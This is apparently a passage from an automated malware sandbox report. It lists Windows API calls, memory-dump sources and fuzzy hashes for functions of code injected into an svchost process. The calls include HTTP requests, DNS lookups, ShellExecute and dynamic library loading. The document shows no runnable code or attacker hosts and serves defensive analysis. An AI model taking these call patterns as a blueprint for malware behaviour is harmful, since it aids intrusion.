                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32 ref: 13143448
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 13143459
                                                                                                                                                                                                                                                          • OpenThread.KERNEL32(00000001,00000000,00000000), ref: 13143478
                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 13143486
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 1314348D
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 13143498
                                                                                                                                                                                                                                                          • ExitThread.KERNEL32 ref: 131434A8
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 131434B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Thread$CriticalDeleteExitSection$CloseCurrentHandleOpenProcessSleepTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3126711353-0
                                                                                                                                                                                                                                                          • Opcode ID: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                                                                                          • Instruction ID: 7e6c1805d5825ce401789290188eb31f8bcae88a10db01c7d1f936579a7b304f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78018FB1500274AFD305BFA2DEC899A7AA9EB05249B194835F90693204C7784844CBB1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5b9f829e16154930bc2954237f6e26f5f5f23b2ef4cecea46de922ead4a31093
                                                                                                                                                                                                                                                          • Instruction ID: 8e175b1d4d2de08a9392ba79f4480ab7675722e82d98283b35c2b2a6d327951d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b9f829e16154930bc2954237f6e26f5f5f23b2ef4cecea46de922ead4a31093
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E341D871704356EBD7009A76CF41FAE3A5DDF406BCF784E22B821E51D4EB70E4868961
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13155480
                                                                                                                                                                                                                                                          • __isctype_l.LIBCMT ref: 131554F3
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Locale$UpdateUpdate::___isctype_l
                                                                                                                                                                                                                                                          • String ID: $$+$-$0$0
                                                                                                                                                                                                                                                          • API String ID: 2547950892-4042548909
                                                                                                                                                                                                                                                          • Opcode ID: d2b3e845f7807b4b5b67cdf3126a2f40e6913829005909c4e3aceb6e8a7baea6
                                                                                                                                                                                                                                                          • Instruction ID: bed7f8d5fe0791fea89fabeed2b31112ef0fb04b8af07330ba512e141b0183dc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2b3e845f7807b4b5b67cdf3126a2f40e6913829005909c4e3aceb6e8a7baea6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE71CD7091228ACFDB11CF68C6513AE7BB6AF03365F6D0159F8B3D6191D3309A91CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountTick
                                                                                                                                                                                                                                                          • String ID: L'
                                                                                                                                                                                                                                                          • API String ID: 536389180-3089082269
                                                                                                                                                                                                                                                          • Opcode ID: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                                                                                          • Instruction ID: 7c7e04ce77545a9cc11d37c0786e132adab084c0dab7ed07bb1ed7d5527e31ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83514175D00309FFCF14CF98C9848AEBBB9FF05354B34866AE569A7291D7309A81CB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(?,1314CF84,00000000,00000000,?,1314CF83,?), ref: 13151ADD
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000002,131414B0), ref: 13151BBE
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 13151BD3
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                                                                                                                          • String ID: %$u
                                                                                                                                                                                                                                                          • API String ID: 1659193697-272644364
                                                                                                                                                                                                                                                          • Opcode ID: 237fb15521333dd449a51c2deaee052b922457626443852c1a191fed9155d609
                                                                                                                                                                                                                                                          • Instruction ID: 7fc1a5fd04cb0a281c89f6f43f958382e6022d5a77df36bedc9fcfbd2a658804
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 237fb15521333dd449a51c2deaee052b922457626443852c1a191fed9155d609
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3741A176A0024AAFDB02DF7C8D849AE7BB9EF16244B194578F855E7204E734EE04CB61
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • getSystemCP.LIBCMT ref: 131544C8
                                                                                                                                                                                                                                                            • Part of subcall function 13154435: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 13154442
                                                                                                                                                                                                                                                            • Part of subcall function 13154435: GetOEMCP.KERNEL32(00000000), ref: 1315445C
                                                                                                                                                                                                                                                          • setSBCS.LIBCMT ref: 131544DA
                                                                                                                                                                                                                                                            • Part of subcall function 13154130: _memset.LIBCMT ref: 13154143
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030), ref: 13154520
                                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,?), ref: 13154533
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 1315454B
                                                                                                                                                                                                                                                          • setSBUpLow.LIBCMT ref: 1315461E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2658552758-0
                                                                                                                                                                                                                                                          • Opcode ID: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                                                                                          • Instruction ID: 259ffcc76c571c273d729dd352e0eb1f8d466d9ffdb8b133224f34a6d63f1319
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af18a46d693f277a3becd28f6804c801e3623c72dd25ab6cf07ae02fca43cde2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE510831B842559BDF15CF29C5C02AABBB5FF07305F19806AF8A1AB142DF38D546CB90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 13145058
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,00000003,00000000,00000000,00000000,00000003,00000000,00000000), ref: 13145078
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1314508D
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 1314509E
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000000), ref: 131450BB
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,0000000A,0000000A), ref: 131450F3
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HttpInternet$OpenRequest$ConnectFileInfoQueryReadSend
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2757949531-0
                                                                                                                                                                                                                                                          • Opcode ID: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                                                                                          • Instruction ID: 09c29ee9dc8f61bf166d10f3b65744c0c26bb08a5acef0fee06af39049fcad0c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22a331550de01ec2645564005e4bf32a19f9b79704b9f3f78d1406bbc28db17e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07211D76601229FBC7219FA5CD88DDF7EBCEF4AA94B240465F505E2144E7758A00DAF0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A60
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A7B
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                                                                                          • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                          • API String ID: 1929421221-629428536
                                                                                                                                                                                                                                                          • Opcode ID: a609e0a7ba11ec13703ef7aa25dba9acf97b0a5567b04403f26ecb8a3393253b
                                                                                                                                                                                                                                                          • Instruction ID: b4e05761edf62e54dbc4545019f5d9e869c00bef6ec4c5d3774284c63bf699bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a609e0a7ba11ec13703ef7aa25dba9acf97b0a5567b04403f26ecb8a3393253b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BF09032B016339BDB25AB34CD809EA3BE49F0765570A9530F834D2568DB34CC038AB1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,13152A25,00000000,13154BC5,00000000,00000000,00000314,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529BD
                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D4
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530FF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529E9
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 13152A04
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Value$AddressHandleModuleProc
                                                                                                                                                                                                                                                          • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                                                                          • API String ID: 1929421221-3682587211
                                                                                                                                                                                                                                                          • Opcode ID: dbd8e95abb6b26bb792cc7c44c719981a33c5c225c9ed220c3a3ad9b10ba74aa
                                                                                                                                                                                                                                                          • Instruction ID: 24c0117114e492440c28f1d5c39adab70944fff5a4f1df7456b3bd22a83b3f8f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbd8e95abb6b26bb792cc7c44c719981a33c5c225c9ed220c3a3ad9b10ba74aa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0BB32A016339FD715AB34CD409E93FE4AF026A571A5031F834D2664DB34C843CBB1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                                                                                          • Instruction ID: a1bc85e87a5082a15a66d266459d616b395269c07320ba7d49f003b92ade8b0e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9483793b51f18562a042eab7b94ad45d390c3c37eb3d74f0cf4db488e0e7b62
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52A1A1B1D00259AFEB11CBA4CE40BEE7FF9AF05244F384065ED45A7241E772AA45CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004), ref: 13144EBC
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(1314E1F5,13141444,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE4A
                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(1314E1F5,-00000004,0000008B,?,?,-00000004,0000008C,00000000,?,00000000), ref: 1314DE6F
                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1314DED5
                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 1314DEDB
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314DF0B
                                                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(00000000,-00000004,0000008E,?,00000000,00000000), ref: 1314DF41
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountCriticalDirectoryEnterExecuteSectionShellSystemTicklstrlenwnsprintf
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 995194965-0
                                                                                                                                                                                                                                                          • Opcode ID: f1b16177eb60bb3f06fffe8c988b7e6be6c45d5d427c6737483f350ae988b7c2
                                                                                                                                                                                                                                                          • Instruction ID: d7977b32be43569a95afd508c2d17b917a4bd55606c831bcbcfa564dc768f962
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b16177eb60bb3f06fffe8c988b7e6be6c45d5d427c6737483f350ae988b7c2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 827116B6A00354BFDF15DFA4CC909DE77ADEB41304F684079E445A7281DB74AA81CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000008,00000000,?,131475F5), ref: 1314F518
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocGdip
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1856340535-0
                                                                                                                                                                                                                                                          • Opcode ID: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                                                                                          • Instruction ID: 58c0bede6d2ce8bc3834ef223cce97252fcec478fb1f6e2d05153a6d4ce50cdf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aebcb12a3578fe10b01d8265182e782cd0a2cf7a18f50d2cb95028721df1330d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3941D67AF40315ABCF059FF8C9846ADB7B9EF48240F384439E515A7340DF759A588BA0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314D075
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 1314D0AE
                                                                                                                                                                                                                                                          • DnsQuery_A.DNSAPI(?,0000000C,00000028,00000000,?,00000000), ref: 1314D0C1
                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(?,-00000004,000000BD,0000000C,00000028,00000000,?,00000000), ref: 1314D0E6
                                                                                                                                                                                                                                                          • DnsRecordListFree.DNSAPI(?,?), ref: 1314D14E
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(0000000C,00000028,00000000,?,00000000), ref: 1314D17B
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: wnsprintf$ErrorFreeLastListQuery_Recordlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3873175859-0
                                                                                                                                                                                                                                                          • Opcode ID: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                                                                                          • Instruction ID: bc62b6f53ce000f612bbbc7078d564fc3d92f5ae585763868b6e5887046a94d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9a01a87296449b41382b83979c05cedc972fd9e8370d67458ba98add1af47bf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F4128B16402596FEB25ABA8CC91BEA3BDCEB15704FA80026FD60D2193D368D554DB31
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(-00000004,000000F5,00000000,00000000,00000004,00000001), ref: 13146E28
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000004), ref: 13146E47
                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 13146E5D
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 13146E6E
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 13146E98
                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 13146EBD
                                                                                                                                                                                                                                                            • Part of subcall function 13142F89: lstrlenA.KERNEL32(?,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 13142FEC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryTimewnsprintf$AddressFileFreeLoadProcSystemlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2555659749-0
                                                                                                                                                                                                                                                          • Opcode ID: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                                                                                          • Instruction ID: 65c2ee745b24d8afc592ee7e773b41c5e4be4c040a78e8adda1288c531677f7c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0bff822e13d61dd72824745379a1d524290620c2234ef465190ce2767934253
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23218B72900229FBDB00EFA4CC849EE7B7CEF08B28F248425F505A6244D7719A55CBA1
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenFile.KERNEL32(00000000,?,00000042), ref: 13144B8A
                                                                                                                                                                                                                                                          • OpenFile.KERNEL32(00000000,?,00001042), ref: 13144BA2
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 13144BA6
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 13144BB2
                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,1314DF21,1314E1F5,00000000), ref: 13144BC4
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 13144BCB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Open$CloseErrorHandleLastPointerWrite
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1166246964-0
                                                                                                                                                                                                                                                          • Opcode ID: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                                                                                          • Instruction ID: eb059693e3b0b8f311bb134399644d03a10fbc70257f38f66da383a90725c8e9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51cdfe6b6749e1e5a26ed3c2d898b94d31f371a768f9a6befa70090ac7cf3a87
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EF04F72601168BBDB246B66DC88DEF3FBDEB89664F008125FA09D3084DB748945DFB0
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(inetcomm.dll,00000000,00000000,00000067,?,?,?,?,?,?,?,?,?,1314DA7C,00000000), ref: 13146CF5
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(inetcomm.dll,?,?,?,?,?,?,?,?,?,1314DA7C,00000000), ref: 13146D00
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                                                                          • String ID: MimeOleGenerateMID$inetcomm.dll
                                                                                                                                                                                                                                                          • API String ID: 4133054770-2511522974
                                                                                                                                                                                                                                                          • Opcode ID: 94ad63e38ac3a08ab869b589b60b6413d575e4a6955d7de3f7f1914c1dab9f78
                                                                                                                                                                                                                                                          • Instruction ID: 236f15d98f7b408e97538bd131e1090bfd1012636229232fb745921e275dcd9e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94ad63e38ac3a08ab869b589b60b6413d575e4a6955d7de3f7f1914c1dab9f78
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF0A031344322EBC301AB79AC44B8FAA6D9FD5A7AF380838F040F1004E72494425272
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2848045515.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_13140000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a9c0f0ee489942955c4d027aee019131bbe61b98e97264bedac0433adbc81ef9
